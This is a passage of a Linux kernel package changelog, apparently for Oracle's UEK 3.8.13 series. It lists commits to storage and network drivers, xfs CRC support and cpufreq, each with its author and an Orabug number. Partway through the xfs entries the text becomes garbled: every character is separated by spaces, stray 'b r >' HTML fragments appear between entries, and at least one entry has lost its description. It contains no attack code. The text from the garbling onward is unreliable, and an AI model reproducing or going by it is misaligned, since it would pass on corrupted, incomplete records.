16.05.01.00' (Martin K. Petersen) [Orabug: 19015667] \n- Revert 'mpt2sas: update from 16.05.01.00 to 17.00.00.00' (Martin K. Petersen) [Orabug: 19015667] \n- Revert 'mpt2sas: Rework the MSI-X code to work on systems with many processors' (Martin K. Petersen) [Orabug: 19015667] \n- megaraid_sas: Version and Changelog update (Adam Radford) [Orabug: 19015667] \n- megaraid_sas: Fix LD/VF affiliation parsing (Adam Radford) [Orabug: 19015667] \n- megaraid_sas: Remove unused variables in megasas_instance (Adam Radford) [Orabug: 19015667] \n- megaraid_sas: Fix reset_mutex leak (Adam Radford) [Orabug: 19015667] \n- megaraid_sas: fix a small problem when reading state value from hw (Tomas Henzl) [Orabug: 19015667] \n- megaraid_sas: Version and Changelog update (Adam Radford) [Orabug: 19015667] \n- megaraid_sas: Add Dell PowerEdge VRTX SR-IOV VF support (Adam Radford) [Orabug: 19015667] \n- megaraid_sas: Return leaked MPT frames to MPT frame pool (Adam Radford) [Orabug: 19015667] \n- megaraid_sas: Fix megasas_ioc_init_fusion (Adam Radford) [Orabug: 19015667] \n- megaraid_sas: Load correct raid context timeout (Adam Radford) [Orabug: 19015667] \n- megaraid_sas: Performance boost fixes (Sumit.Saxena@lsi.com) [Orabug: 19015667] \n- megaraid_sas: Set 32-bit DMA mask (Sumit.Saxena@lsi.com) [Orabug: 19015667] \n- megaraid_sas: Big endian code related fixes (Sumit.Saxena@lsi.com) [Orabug: 19015667] \n- megaraid_sas: Don't wait forever for non-IOCTL DCMDs (Sumit.Saxena@lsi.com) [Orabug: 19015667] \n- megaraid_sas: check return value for megasas_get_pd_list() (Hannes Reinecke) [Orabug: 19015667] \n- megaraid_sas_fusion: Return correct error value in megasas_get_ld_map_info() (Hannes Reinecke) [Orabug: 19015667] \n- megaraid_sas_fusion: correctly pass queue info pointer (Hannes Reinecke) [Orabug: 19015667] \n- megaraid: missing bounds check in mimd_to_kioc() (Dan Carpenter) [Orabug: 19015667] \n- megaraid: Use resource_size_t for PCI resources, not long (Ben Collins) [Orabug: 19015667]\n[3.8.13-39]\n- PCI: Work around Ivytown NTB BAR size issue (Jon Mason) [Orabug: 18127862] \n- cgroup: make cgroup_path() not print double slashes (Tejun Heo) [Orabug: 18510637] \n- xen: Introduce 'xen_nopv' to disable PV extensions for HVM guests. (Konrad Rzeszutek Wilk) [Orabug: 19033747] \n- spec: reenable pesign module signing (Guangyu Sun) [Orabug: 19065003] \n- [ocfs2]: refcount: take rw_lock in ocfs2_reflink (Wengang Wang) [Orabug: 19154247] \n- cifs: bugfix for unreclaimed writeback pages in cifs_writev_requeue() (Ouyang Maochun) [Orabug: 18447168] \n- xfs: add CRCs to attr leaf blocks (Dave Chinner) [Orabug: 18504299] \n- xfs: add CRCs to dir2/da node blocks (Dave Chinner) [Orabug: 18504299] \n- xfs: shortform directory offsets change for dir3 format (Dave Chinner) [Orabug: 18504299] \n- xfs: add CRC checking to dir2 leaf blocks (Dave Chinner) [Orabug: 18504299] \n- xfs: add CRC checking to dir2 data blocks (Dave Chinner) [Orabug: 18504299] \n- xfs: add CRC checking to dir2 free blocks (Dave Chinner) [Orabug: 18504299] \n- xfs: add CRC checks to block format directory blocks (Dave Chinner) [Orabug: 18504299] \n- xfs: add CRC checks to remote symlinks (Dave Chinner) [Orabug: 18504299] \n- xfs: split out symlink code into it's own file. (Dave Chinner) [Orabug: 18504299] \n- xfs: add version 3 inode format with CRCs (Christoph Hellwig) [Orabug: 18504299] \n- xfs: add CRC checks for quota blocks (Christoph Hellwig) [Orabug: 18504299] \n- xfs: add CRC checks to the AGI (Dave Chinner) [Orabug: 18504299] \n- xfs: add CRC checks to the AGFL (Christoph Hellwig) [Orabug: 18504299] \n- xfs: add CRC checks to the AGF (Dave Chinner) [Orabug: 18504299] \n- xfs: add support for large btree blocks (Christoph Hellwig) [Orabug: 18504299] \n- xfs: xfs_iomap_prealloc_size() tracepoint (Brian Foster) [Orabug: 18504299] \n- xfs: add quota-driven speculative preallocation throttling (Brian Foster) [Orabug: 18504299] \n- xfs: xfs_dquot prealloc throttling watermarks and low free space (Brian Foster) [Orabug: 18504299] \n- xfs: pass xfs_dquot to xfs_qm_adjust_dqlimits() instead of xfs_disk_dquot_t (Brian Foster) [Orabug: 18504299] \n- xfs: push rounddown_pow_of_two() to after prealloc throttle (Brian Foster) [Orabug: 18504299] \n- xfs: reorganize xfs_iomap_prealloc_size to remove indentation (Brian Foster) [Orabug: 18504299] \n- xfs: take inode version into account in XFS_LITINO (Christoph Hel l w i g ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : r e a r r a n g e s o m e c o d e i n x f s _ b m a p f o r b e t t e r l o c a l i t y ( D a v e C h i n n e r ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : d o n ' t v e r i f y b u f f e r s a f t e r I O e r r o r s ( D a v e C h i n n e r ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : l i m i t s p e c u l a t i v e p r e a l l o c s i z e o n s p a r s e f i l e s ( D a v e C h i n n e r ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : m e m o r y b a r r i e r b e f o r e w a k e _ u p _ b i t ( ) ( A l e x E l d e r ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : r e f a c t o r s p a c e l o g r e s e r v a t i o n f o r X F S _ T R A N S _ A T T R _ S E T ( J e f f L i u ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : m a k e u s e o f X F S _ S B _ L O G _ R E S ( ) a t x f s _ f s _ l o g _ d u m m y ( ) ( J e f f L i u ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : m a k e u s e o f X F S _ S B _ L O G _ R E S ( ) a t x f s _ m o u n t _ l o g _ s b ( ) ( J e f f L i u ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : m a k e u s e o f X F S _ S B _ L O G _ R E S ( ) a t x f s _ l o g _ s b c o u n t ( ) ( J e f f L i u ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : i n t r o d u c e X F S _ S B _ L O G _ R E S ( ) f o r t r a n s a c t i o n s t h a t m o d i f y s b o n d i s k ( J e f f L i u ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : c a l c u l a t e X F S _ T R A N S _ Q M _ Q U O T A O F F _ E N D s p a c e l o g r e s e r v a t i o n a t m o u n t t i m e ( J e f f L i u ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : c a l c u l a t e X F S _ T R A N S _ Q M _ Q U O T A O F F s p a c e l o g r e s e r v a t i o n a t m o u n t t i m e ( J e f f L i u ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : c a l c u l a t e X F S _ T R A N S _ Q M _ D Q A L L O C s p a c e l o g r e s e r v a t i o n a t m o u n t t i m e ( J e f f L i u ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : c a l c u a t e X F S _ T R A N S _ Q M _ S E T Q L I M s p a c e l o g r e s e r v a t i o n a t m o u n t t i m e ( J e f f L i u ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : c a l c u l a t e x f s _ q m _ w r i t e _ s b _ c h a n g e s ( ) s p a c e l o g r e s e r v a t i o n a t m o u n t t i m e ( J e f f L i u ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : c a l c u l a t e X F S _ T R A N S _ Q M _ S B C H A N G E s p a c e l o g r e s e r v a t i o n a t m o u n t t i m e ( J e f f L i u ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : m a k e u s e o f x f s _ c a l c _ b u f _ r e s ( ) i n x f s _ t r a n s . c ( J e f f L i u ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : a d d a h e l p e r t o f i g u r e o u t t h e s p a c e l o g r e s e r v a t i o n p e r i t e m ( J e f f L i u ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : f i x f s / x f s / x f s _ l o g . c : 1 7 4 0 : 3 9 : e r r o r : ' B _ T R U E ' u n d e c l a r e d ( B e n M y e r s ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : R e m o v e b o o l e a n _ t t y p e d e f c o m p l e t e l y . ( T h i a g o F a r i n a ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > ( A b h i j i t P a w a r ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s : d o n ' t z e r o s t r u c t u r e m e m b e r s a f t e r a m e m s e t ( 0 ) ( E r i c S a n d e e n ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - x f s r e m o v e t h e X F S _ T R A N S _ D E B U G r o u t i n e s ( M a r k T i n g u e l y ) [ O r a b u g : 1 8 5 0 4 2 9 9 ] b r > - s p e c : l i s t l i n u x - f i r m w a r e a s a d e p e n d e n c y ( G u a n g y u S u n ) [ O r a b u g : 1 8 5 3 9 1 0 0 ] b r > - k b u i l d / c t f : F i x o u t - o f - t r e e m o d u l e b u i l d w h e n C O N F I G _ C T F = n . ( N i c k A l c o c k ) [ O r a b u g : 1 9 0 7 8 3 6 1 ] b r > - d t r a c e : s u p p o r t o r d e r - o n l y - p r e r e q u i s i t e s f o r s d t s t u b g e n e r a t i o n ( K r i s V a n H e e s ) [ O r a b u g : 1 8 9 0 6 4 4 4 ] b r > - q l c n i c : A d d S R I O V h e l p e r f u n c t i o n t o d e t e r m i n e i f V F s a r e a s s i g n e d t o g u e s t ( V a u g h a n C a o ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : m a k e K c o n f i g c h a n g e s ( V a u g h a n C a o ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : s y s f s i n t e r f a c e f o r P C I B A R a c c e s s ( S o n y C h a c k o ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : U p d a t e v e r s i o n t o 5 . 3 . 5 9 ( R a j e s h B o r u n d i a ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : C o l l e c t f i r m w a r e d u m p u s i n g D M A o n 8 2 x x a d a p t e r s ( S h a h e d S h a i k h ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : A d d m a c l e a r n i n g s u p p o r t t o S R - I O V V F . ( R a j e s h B o r u n d i a ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : A d d s u p p o r t t o p r o c e s s c o m m a n d s i n a t o m i c c o n t e x t ( R a j e s h B o r u n d i a ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : A l l o w S R - I O V V F p r o b e i n h y p e r v i s o r . ( R a j e s h B o r u n d i a ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : S e t r e a l _ n u m _ { t x | r x } _ q u e u e s p r o p e r l y ( S h a h e d S h a i k h ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : F i x p a n i c w h i l e d u m p i n g T X q u e u e s o n T X t i m e o u t ( M a n i s h C h o p r a ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : U p d a t e v e r s i o n t o 5 . 3 . 5 8 ( J i t e n d r a K a l s a r i a ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : L i m i t v N I C s u p p o r t i n l e g a c y i n t e r r u p t m o d e ( S u c h e t a C h a k r a b o r t y ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : A d d d r i v e r l o g s i n e r r o r p a t h . ( S u c h e t a C h a k r a b o r t y ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : A l l o w s e t t i n g T X i n t e r r u p t c o a l e s c i n g p a r a m e t e r s f r o m V F . ( S u c h e t a C h a k r a b o r t y ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : A d d h w m o n - s y s f s i n t e r f a c e t o e x p o r t b o a r d t e m p e r a t u r e . ( H a r i s h P a t i l ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : O p t i m i z e M A C l e a r n i n g c o d e ( S h a h e d S h a i k h ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : F i x m e m o r y l e a k . ( R a j e s h B o r u n d i a ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : R e s e t f i r m w a r e A P I l o c k a t d r i v e r l o a d t i m e ( S o n y C h a c k o ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : F i x M S I - X i n i t i a l i z a t i o n c o d e ( A l e x a n d e r G o r d e e v ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : D o n o t d i s a b l e S R - I O V w h e n V F s a r e a s s i g n e d t o V M s ( M a n i s h C h o p r a ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : F i x Q L o g i c a p p l i c a t i o n / d r i v e r i n t e r f a c e f o r v i r t u a l N I C c o n f i g u r a t i o n ( J i t e n d r a K a l s a r i a ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : F i x P V I D c o n f i g u r a t i o n o n e S w i t c h p o r t . ( J i t e n d r a K a l s a r i a ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : F i x m a x r i n g c o u n t c a l c u l a t i o n ( S h a h e d S h a i k h ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : F i x t o s e n d I N I T _ N I C _ F U N C a s f i r s t m a i l b o x . ( S u c h e t a C h a k r a b o r t y ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : F i x p a n i c d u e t o u n i n i t i a l z e d d e l a y e d _ w o r k s t r u c t i n u s e . ( S u c h e t a C h a k r a b o r t y ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - n e t : q l c n i c : i n c l u d e i r q . h f o r i r q d e f i n i t i o n s ( J o s h B o y e r ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : R e m o v e c a s t s o f p o i n t e r t o s a m e t y p e ( J o e P e r c h e s ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : U p d a t e v e r s i o n t o 5 . 3 . 5 7 ( S h a h e d S h a i k h ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : d c b : a c o u p l e o f f b y o n e b u g s ( D a n C a r p e n t e r ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : F i x n u m b e r o f r i n g s w h e n w e f a l l b a c k f r o m m s i x t o l e g a c y . ( R a j e s h B o r u n d i a ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : A l l o w a n y V L A N t o b e c o n f i g u r e d f r o m V F . ( S u c h e t a C h a k r a b o r t y ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : F i x u s a g e o f u s e _ m s i a n d u s e _ m s i _ x m o d u l e p a r a m e t e r s ( S h a h e d S h a i k h ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : F i x f u n c t i o n r e t u r n e r r o r c h e c k ( S h a h e d S h a i k h ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : U p d a t e v e r s i o n t o 5 . 3 . 5 6 ( S h a h e d S h a i k h ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : E n h a n c e s e m a p h o r e l o c k a c c e s s f a i l u r e e r r o r m e s s a g e ( H a r i s h P a t i l ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : A l l o w v l a n 0 t r a f f i c ( R a j e s h B o r u n d i a ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : E n h a n c e d r i v e r m e s s a g e i n f a i l e d s t a t e . ( S u c h e t a C h a k r a b o r t y ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : U p d a t e s t o Q L o g i c a p p l i c a t i o n / d r i v e r i n t e r f a c e f o r v i r t u a l N I C c o n f i g u r a t i o n ( J i t e n d r a K a l s a r i a ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : R e - f a c t o r f i r m w a r e m i n i d u m p t e m p l a t e h e a d e r h a n d l i n g ( S h a h e d S h a i k h ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : C l e a n u p q l c n i c _ e n a b l e _ m s i x ( ) r e t u r n v a l u e s ( A l e x a n d e r G o r d e e v ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l c n i c : R e v e r s e p a t c h e s t i l l 5 . 3 . 5 5 . ( S u c h e t a C h a k r a b o r t y ) [ O r a b u g : 1 9 1 6 7 8 7 7 ] b r > - q l a 4 x x x : U p d a t e d r i v e r v e r i o n t o v 5 . 0 4 . 0 0 . 0 6 . 0 6 . 0 2 - u e k 3 ( T e j P a r k a s h ) [ O r a b u g : 1 9 1 4 4 3 5 0 ] b r > - q l a 4 x x x : U s e k m e m d u p i n s t e a d o f k m a l l o c + m e m c p y ( B e n o i t T a i n e ) [ O r a b u g : 1 9 1 4 4 3 5 0 ] b r > - q l a 4 x x x : F i x s m a t c h w a r n i n g i n f u n c q l a 4 x x x _ c o n n _ g e t _ p a r a m ( A d h e e r C h a n d r a v a n s h i ) [ O r a b u g : 1 9 1 4 4 3 5 0 ] b r > - q l a 4 x x x : F i x s m a t c h w a r n i n g i n f u n c q l a 4 x x x _ g e t _ e p _ p a r a m ( A d h e e r C h a n d r a v a n s h i ) [ O r a b u g : 1 9 1 4 4 3 5 0 ] b r > - q l a 4 x x x : F i x m e m o r y l e a k f o r h a - > s a v e d _ a c b ( N i l e s h J a v a l i ) [ O r a b u g : 1 9 1 4 4 3 5 0 ] b r > - q l a 4 x x x : E x p o r t s y s f s D D B s f r o m D P C h a n d l e r ( N i l e s h J a v a l i ) [ O r a b u g : 1 9 1 4 4 3 5 0 ] b r > - q l a 4 x x x : D i s a b l e I N T x i n t e r r u p t f o r I S P 8 2 X X ( T e j P a r k a s h ) [ O r a b u g : 1 9 1 4 4 3 5 0 ] b r > - h p s a : a d d p r e v i o u s l y m i s s i n g p c i _ d e v i c e _ i d ( V a u g h a n C a o ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : f i x h a n d l i n g o f h p s a _ v o l u m e _ o f f l i n e r e t u r n v a l u e ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : r e t u r n - E N O M E M n o t - 1 o n k z a l l o c f a i l u r e i n h p s a _ g e t _ d e v i c e _ i d ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : r e m o v e m e s s a g e s a b o u t v o l u m e s t a t u s V P D i n q u i r y p a g e n o t s u p p o r t e d ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : r e p o r t c h e c k c o n d i t i o n e v e n i f n o s e n s e d a t a p r e s e n t f o r i o a c c e l 2 m o d e ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : r e m o v e b a d u n l i k e l y a n n o t a t i o n f r o m d e v i c e l i s t u p d a t i n g c o d e ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : f i x e v e n t f i l t e r i n g t o p r e v e n t e x c e s s i v e r e s c a n s w i t h o l d f i r m w a r e ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : k i l l a n n o y i n g m e s s a g e s a b o u t S S D S m a r t P a t h r e t r i e s ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : d e f i n e e x t e n d e d _ r e p o r t _ l u n _ e n t r y d a t a s t r u c t u r e ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : R e a r r a n g e s t a r t _ i o t o a v o i d o n e u n l o c k / l o c k s e q u e n c e i n m a i n i o p a t h ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : a v o i d u n n e c e s s a r y r e a d l o n e v e r y c o m m a n d s u b m i s s i o n ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : u s e p e r - c p u v a r i a b l e f o r l o c k u p _ d e t e c t e d ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : s e t i r q a f f i n i t y h i n t s t o r o u t e M S I - X v e c t o r s a c r o s s C P U s ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : a l l o c a t e r e p l y q u e u e s i n d i v i d u a l l y ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : c h o o s e n u m b e r o f r e p l y q u e u e s m o r e i n t e l l i g e n t l y . ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : r e m o v e d e v _ d b g ( ) c a l l s f r o m h o t p a t h s ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : u s e g c c a l i g n e d a t t r i b u t e i n s t e a d o f m a n u a l l y p a d d i n g s t r u c t s ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : c h a n g e d o o r b e l l r e s e t d e l a y t o t e n s e c o n d s ( J u s t i n L i n d l e y ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : a l l o w p a s s t h r u i o c t l s t o w o r k w i t h b i d i r e c t i o n a l c o m m a n d s ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : r e m o v e u n u s e d f i e l d s f r o m s t r u c t c t l r _ i n f o ( S t e p h e n M . C a m e r o n ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : f i x b a d c o m p a r i s o n o f s i g n e d w i t h u n s i g n e d i n h p s a _ u p d a t e _ s c s i _ d e v i c e s ( J o e H a n d z i k ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : d o n o t i g n o r e f a i l u r e o f s e n s e c o n t r o l l e r p a r a m e t e r s c o m m a n d ( J o e H a n d z i k ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : f i x m e m o r y l e a k i n h p s a _ h b a _ m o d e _ e n a b l e d ( J o e H a n d z i k ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : C h e c k i n g f o r a N U L L r e t u r n f r o m a k z a l l o c c a l l ( J o e H a n d z i k ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : u n n e c e s s a r y t y p e c o n v e r s i o n f o r p h y s d e v _ l i s t ( V a u g h a n C a o ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : d e t e c t _ c o n t r o l l e r _ l o c k u p d o n ' t n e e d r e t u r n v a l u e ( V a u g h a n C a o ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - h p s a : f i x u p M S I - X r e g i s t r a t i o n ( H a n n e s R e i n e c k e ) [ O r a b u g : 1 9 1 3 7 8 2 1 ] b r > - x e n / m i c r o c o d e : U s e d u m m y m i c r o c o d e _ o p s f o r n o n i n i t i a l d o m a i n g u e s t ( Z h e n z h o n g D u a n ) [ O r a b u g : 1 9 0 5 3 6 2 6 ] b r > - h y p e r v : C h a n g e t h e r e c e i v e b u f f e r s i z e f o r l e g a c y h o s t s ( H a i y a n g Z h a n g ) [ O r a b u g : 1 9 0 5 0 4 9 6 ] b r > - b e 2 n e t : f i x q n q m o d e d e t e c t i o n o n V F s ( S u r e s h R e d d y ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - b e 2 n e t : c l e a n u p M C C a s y n c e v e n t p r o c e s s i n g c o d e ( S a t h y a P e r l a ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - b e 2 n e t : m o v e a s y n c c m d p r o c e s s i n g t o a s e p a r a t e r o u t i n e ( S a t h y a P e r l a ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - b e 2 n e t : r e - f a c t o r M C C Q e r r o r s t a t u s h a n d l i n g c o d e ( K a l e s h A P ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - b e 2 n e t : s u p p o r t f l a s h i n g n e w r e g i o n s o n S k y h a w k - R ( V a s u n d h a r a V o l a m ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - b e 2 n e t : s k i p m u l t i c a s t p r o m i s c u o s s e t t i n g i n a l r e a d y s e t ( K a l e s h A P ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - b e 2 n e t : e n a b l e i n t e r r u p t s i n E E H r e s u m e ( K a l e s h A P ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - n e t : g e t r i d o f S E T _ E T H T O O L _ O P S ( W i l f r i e d K l a e b e ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - b e 2 n e t : u s e M C C Q i n s t e a d o f M B O X i n b e _ c m d _ r s s _ c o n f i g ( ) ( K a l e s h A P ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - b e 2 n e t : i n c l u d e r x - c o m p l e r r o r c o u n t e r i n e t h t o o l s t a t s ( K a l e s h A P ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - b e 2 n e t : r e m o v e u n u s e d c o d e i n b e _ c m d _ v l a n _ c o n f i g ( ) ( K a l e s h A P ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - b e 2 n e t : c o v e r t v l a n a r r a y t o b i t - m a p ( R a v i k u m a r N e l a v e l l i ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - b e 2 n e t : f i x l i n e w r a p a n d f u n c t i o n c a l l i n d e n t a t i o n i n b e _ e t h t o o l . c ( S a t h y a P e r l a ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - b e 2 n e t : f i x f u n c t i o n c a l l i n d e n t a t i o n i n b e _ c m d s . c ( S a t h y a P e r l a ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - b e 2 n e t : f i x l i n e w r a p a n d f u n c t i o n c a l l i n d e n t a t i o n i n b e _ m a i n . c ( S a t h y a P e r l a ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - b e 2 n e t : F i x i n v o c a t i o n o f b e _ c l o s e ( ) a f t e r b e _ c l e a r ( ) ( K a l e s h A P ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - b e 2 n e t : F i x t o r e a p T X c o m p l s t i l l H W d o e s n ' t r e s p o n d f o r s o m e t i m e ( V a s u n d h a r a V o l a m ) [ O r a b u g : 1 9 0 0 6 4 5 5 ] b r > - s e l i n u x : c o r r e c t l y l a b e l / p r o c i n o d e s i n u s e b e f o r e t h e p o l i c y i s l o a d e d ( P a u l M o o r e ) [ O r a b u g : 1 8 8 2 3 6 2 1 ] b r > - m m , h u g e t l b : i m p r o v e p a g e - f a u l t s c a l a b i l i t y ( D a v i d l o h r B u e s o ) [ O r a b u g : 1 8 7 5 7 2 5 6 ] b r > - c o n f i g : b u i l d T P M H W R a n d o m N u m b e r G e n e r a t o r a s m o d u l e ( G u a n g y u S u n ) [ O r a b u g : 1 8 5 0 2 0 2 4 ] b r > - c p u f r e q : D r o p r w s e m l o c k a r o u n d C P U F R E Q _ G O V _ P O L I C Y _ E X I T ( V i r e s h K u m a r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : P r e s e r v e s y s f s f i l e s a c r o s s s u s p e n d / r e s u m e ( S r i v a t s a S . B h a t ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q , o n d e m a n d : R e m o v e l e f t o v e r d e b u g l i n e ( B o r i s l a v P e t k o v ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : I s s u e C P U F R E Q _ G O V _ P O L I C Y _ E X I T n o t i f i e r b e f o r e d r o p p i n g p o l i c y r e f c o u n t ( V i r e s h K u m a r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : g o v e r n o r s : F i x C P U F R E Q _ G O V _ P O L I C Y _ { I N I T | E X I T } n o t i f i e r s ( V i r e s h K u m a r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : R e v e r t i n c o r r e c t c o m m i t 5 8 0 0 0 4 3 ( R a f a e l J . W y s o c k i ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : D o n ' t c a l l _ _ c p u f r e q _ g o v e r n o r ( ) f o r d r i v e r s w i t h o u t t a r g e t ( ) ( V i r e s h K u m a r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : c o n v e r t c p u f r e q _ d r i v e r t o u s i n g R C U ( N a t h a n Z i m m e r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : C a l l _ _ c p u f r e q _ g o v e r n o r ( ) w i t h c o r r e c t p o l i c y - > c p u s m a s k ( V i r e s h K u m a r ) [ O r a 